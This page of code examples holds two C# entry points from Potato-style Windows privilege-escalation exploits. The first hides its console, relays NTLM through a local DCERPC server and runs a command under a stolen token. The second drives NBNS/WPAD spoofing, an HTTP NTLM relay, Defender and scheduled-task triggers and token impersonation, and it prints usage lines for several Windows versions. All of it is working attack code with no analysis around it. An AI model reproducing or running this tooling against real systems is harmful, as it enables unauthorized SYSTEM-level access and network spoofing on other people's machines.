Пример #1
0
        static int Main(string[] args)
        {
            IntPtr handle = GetConsoleWindow();

            // Hide
            ShowWindow(handle, SW_HIDE);


            InvokePrivs.EnablePriv("SeImpersonatePrivilege");

            if (args.LongLength > 0)
            {
                string cmd = args[0];  //= Shell.GetCommand(Process.GetCurrentProcess().MainModule.FileName);
            }
            else
            {
                Environment.Exit(-1);
            }

            DCERPCNtlmHandler dcerpcServer    = new DCERPCNtlmHandler();
            Thread            bootstrapThread = null;
            Thread            dcerpcThread    = null;

            dcerpcThread = new Thread(() => dcerpcServer.start("127.0.0.1", "6666", "127.0.0.1", "135", false, "true", cmd));
            dcerpcThread.Start();
            Thread.Sleep(100);
            try
            {
                bootstrapThread = new Thread(() => ComUtils.BootstrapComMarshal());
                bootstrapThread.Start();
            }
            catch (Exception e)
            {
                Console.WriteLine("This wasn't supposed to happen... {0}", e);
            }


            if (dcerpcThread != null)
            {
                DCERPCNtlmHandler.finished.WaitOne();
                if (!Shell.NtShell)
                {
                    NtToken main_token = NtToken.OpenProcessToken();

                    //TokenUtils.CreateProcessForToken("powershell.exe -EncodedCommand " + cmd, main_token, false);
                    TokenUtils.CreateProcessForToken(cmd, main_token, false);
                }

                Thread.Sleep(100);
                Environment.Exit(0);


                dcerpcThread.Abort();
                bootstrapThread.Abort();
            }
            Environment.Exit(0);
            return(0);
        }
Пример #2
0
        //
        static int Main(string[] args)
        {
            Dictionary <string, string> argDict = parseArgs(args);
            String cmd = "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String ip = null, drop_first = null, enable_httpserver = null, spoof_address = null,
                   enable_dce = null, enable_exhaust = null, enable_spoof = null, enable_defender = null,
                   enable_defender_scan = null, schedule_task = null, spoof_host = "WPAD", enable_etw = null, enable_token = null;
            String wpad_exclude_str = "live.sysinternals.com";
            int    srvPort          = 80;

            if (argDict.ContainsKey("ip"))
            {
                ip = argDict["ip"];
            }
            if (argDict.ContainsKey("cmd"))
            {
                cmd = argDict["cmd"];
            }
            if (argDict.ContainsKey("enable_exhaust"))
            {
                enable_exhaust = argDict["enable_exhaust"];
            }
            if (argDict.ContainsKey("enable_httpserver"))
            {
                enable_httpserver = argDict["enable_httpserver"];
            }
            if (argDict.ContainsKey("enable_defender"))
            {
                enable_defender = argDict["enable_defender"];
            }
            if (argDict.ContainsKey("enable_defender_scan"))
            {
                enable_defender_scan = argDict["enable_defender_scan"];
            }
            if (argDict.ContainsKey("enable_spoof"))
            {
                enable_spoof = argDict["enable_spoof"];
            }
            if (argDict.ContainsKey("enable_etw"))
            {
                enable_etw = argDict["enable_etw"];
            }
            if (argDict.ContainsKey("spoof_host"))
            {
                spoof_host = argDict["spoof_host"];
            }
            if (argDict.ContainsKey("wpad_exclude"))
            {
                wpad_exclude_str = argDict["wpad_exclude"];
            }
            if (argDict.ContainsKey("schedule_task"))
            {
                schedule_task = argDict["schedule_task"];
            }
            if (argDict.ContainsKey("srv_port"))
            {
                srvPort = Int32.Parse(argDict["srv_port"]);
            }
            if (argDict.ContainsKey("enable_dce"))
            {
                enable_dce = argDict["enable_dce"];
            }
            if (argDict.ContainsKey("spoof_address"))
            {
                spoof_address = argDict["spoof_address"];
            }
            else
            {
                spoof_address = "127.0.0.1";
            }
            if (argDict.ContainsKey("drop_first_dcom"))
            {
                drop_first = argDict["drop_first_dcom"];
            }
            if (argDict.ContainsKey("enable_token"))
            {
                enable_token = argDict["enable_token"];
            }
            ;
            //
            if (args.Length > 0)
            {
                if (args[0].ToLower() == "-h" || args[0].ToLower() == "--h" || args[0].ToLower() == "-help" || args[0].ToLower() == "--help" || args[0].ToLower() == "/?")
                {
                    PrintHelp();
                    Console.WriteLine("\nExample Windows 7:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true");
                    Console.WriteLine("\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -schedule_task true");
                    Console.WriteLine("\nExample Windows Server 2008:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_spoof true -spoof_host \"WPAD.DOMAIN.TLD\" ");
                    Console.WriteLine("\nExample Windows Server 2012:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_spoof true");
                    Console.WriteLine("\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_defender_scan true");
                    Console.WriteLine("\nExample Enable WebClient:\nPotato.exe -enable_etw true\nPotato.exe -enable_etw 22b6d684-fa63-4578-87c9-effcbe6643c7");
                    Console.WriteLine("\nExample IIS/MSSQL/*:\nPotato.exe -enable_token true -enable_dce true");
                    Console.WriteLine("Potato.exe -enable_token true -enable_httpserver true -enable_defender_scan true -srv_port 9595");
                    Console.WriteLine("Potato.exe");
                    Environment.Exit(0);
                }
            }
            else
            {
                enable_token = "true";
                enable_dce   = "true";
            }
            //
            if (enable_token != null)
            {
                // Console.WriteLine("Enabiling your privs....");
                InvokePrivs.EnablePriv("SeImpersonatePrivilege");
            }
            //
            if (enable_etw != null)
            {
                EventTriggers.start_service(enable_etw);
            }
            //
            String[]        wpad_exclude     = wpad_exclude_str.Split(',');
            HTTPNtlmHandler httpServer       = new HTTPNtlmHandler();
            Thread          httpServerThread = null;

            if (enable_httpserver != null && enable_httpserver.Equals("true"))
            {
                httpServerThread = new Thread(() => httpServer.startListening(cmd, wpad_exclude, srvPort, enable_token));
                httpServerThread.Start();
            }
            //
            DCERPCNtlmHandler dcerpcServer = new DCERPCNtlmHandler();
            bool   dropFirst       = drop_first != null && drop_first.Equals("true");
            Thread bootstrapThread = null;
            Thread dcerpcThread    = null;

            if (enable_dce != null && enable_dce.Equals("true"))
            {
                dcerpcThread = new Thread(() => dcerpcServer.start("127.0.0.1", "6666", "127.0.0.1", "135", cmd, dropFirst, enable_token));
                dcerpcThread.Start();
                Thread.Sleep(100);
                try
                {
                    bootstrapThread = new Thread(() => ComUtils.BootstrapComMarshal());
                    bootstrapThread.Start();
                }
                catch (Exception e)
                {
                    Console.WriteLine("This wasn't supposed to happen... {0}", e);
                }
            }
            //
            Spoofer spoof         = new NBNSSpoofer();
            bool    enableExhaust = enable_exhaust != null && enable_exhaust.Equals("true");
            Thread  spoofThread   = new Thread(() => spoof.startSpoofing(ip, spoof_host, spoof_address, enableExhaust));

            if (enable_spoof != null && enable_spoof.Equals("true"))
            {
                if (ip == null || spoof_address == null)
                {
                    Console.WriteLine("Need IP and spoof address for spoofing?");
                    Environment.Exit(0);
                }
                spoofThread.Start();
                if (enableExhaust)
                {
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoof.checkSpoof(spoof_host, spoof_address);
                Console.WriteLine("Spoofed target " + spoof_host + " succesfully...");
            }
            //
            UpdateLauncher updateL       = new UpdateLauncher();
            Thread         updateLThread = new Thread(() => updateL.launchUpdateCheck());

            if (enable_defender != null && enable_defender.Equals("true"))
            {
                updateLThread.Start();
            }
            //
            Thread scanLThread = new Thread(() => updateL.scan_file(srvPort));

            if (enable_defender_scan != null && enable_defender_scan.Equals("true"))
            {
                scanLThread.Start();
            }
            //
            ScheduleTask sc      = new ScheduleTask();
            Thread       schTask = new Thread(() => sc.schtask(srvPort));

            if (schedule_task != null && schedule_task.Equals("true"))
            {
                schTask.Start();
            }
            //
            if (httpServerThread != null)
            {
                httpServer.finished.WaitOne();
                httpServerThread.Abort();
            }
            //
            if (dcerpcThread != null)
            {
                DCERPCNtlmHandler.finished.WaitOne();
                dcerpcThread.Abort();
                bootstrapThread.Abort();
            }
            //
            spoofThread.Abort();
            updateLThread.Abort();
            scanLThread.Abort();
            Thread.Sleep(500);
            Environment.Exit(0);
            return(0);
        }